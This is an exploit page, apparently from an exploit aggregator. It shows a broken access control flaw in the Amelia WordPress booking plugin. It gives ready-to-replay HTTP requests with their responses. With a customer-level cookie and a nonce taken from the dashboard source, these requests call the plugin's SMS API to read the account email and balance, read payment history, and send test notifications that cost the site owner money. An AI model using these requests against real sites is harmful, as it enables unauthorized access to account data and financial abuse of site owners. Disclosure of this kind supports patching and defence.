Share
## https://sploitus.com/exploit?id=WPEX-ID:0882E5C0-F319-4994-9346-AA18438FDA6A
To get the ameliaNonce, view the source code of the Amelia dashboard when logged in as a customer and look for "wpAmeliaNonce"

## Get User Info
POST /wp-admin/admin-ajax.php?action=wpamelia_api&call=/notifications/sms&ameliaNonce=785ba17145 HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Cookie: [customer+]
Content-Type: application/json;charset=utf-8
Content-Length: 24

{"action":"getUserInfo"}

Response:
{"message":"Amelia SMS API request successful","data":{"status":"OK","user":{"email":"redacted@gmail.com","balance":0}}}

## Get Payment History
POST /wp-admin/admin-ajax.php?action=wpamelia_api&call=/notifications/sms&ameliaNonce=785ba17145 HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Cookie: [customer+]
Content-Type: application/json;charset=utf-8
Content-Length: 30

{"action":"getPaymentHistory"}

Response:
{"message":"Amelia SMS API request successful","data":{"status":"OK","payments":[],"countFiltered":0}}

## Send test notification (cost real money)
POST /wp-admin/admin-ajax.php?action=wpamelia_api&call=/notifications/sms&ameliaNonce=785ba17145 HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Cookie: [customer+]
Content-Type: application/json;charset=utf-8
Content-Length: 146

{
  "action":"testNotification",
  "data":{
    "type": "appointment",
    "notificationTemplate": 1,
    "recipientPhone":"11111111"
  }
}